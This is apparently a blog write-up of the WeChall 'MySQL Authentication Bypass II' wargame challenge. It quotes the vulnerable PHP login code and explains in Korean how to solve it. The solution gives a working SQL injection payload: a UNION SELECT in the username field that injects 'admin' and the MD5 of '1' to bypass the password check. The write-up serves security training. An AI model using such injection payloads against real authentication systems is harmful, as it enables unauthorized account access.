Wechall - MySQL II
MySQL Authentication Bypass II
1
2
3
4
5
6
7
8
This one is the same as MySQL1,
but you have to come up with a more advanced injection
to trick this authentication.
Your mission is again: Login yourself as admin.
Again you are given the sourcecode, also as highlighted version.
Enjoy!
Solution
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$password = md5($password);
$query = "SELECT * FROM users WHERE username='$username'";
#############################
### This is the new check ###
if ($result['password'] !== $password) {
echo GWF_HTML::error('Auth2', $chall->lang('err_password'), false);
return false;
} # End of the new code ###
#############################
if (strtolower($result['username']) === 'admin') {
$chall->onChallengeSolved(GWF_Session::getUserID());
}
admin 아이디를 불러오고, 가져온 비밀번호와 입력한 비밀번호를 md5화 한 값이 동일해야 함.
따라서 union select를 이용해 1을 md5화 한 값을 넣어주고 비밀번호로 1을 입력하면 성공.
1
2
username : ' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b' #
password : 1
This post is licensed under CC BY 4.0 by the author.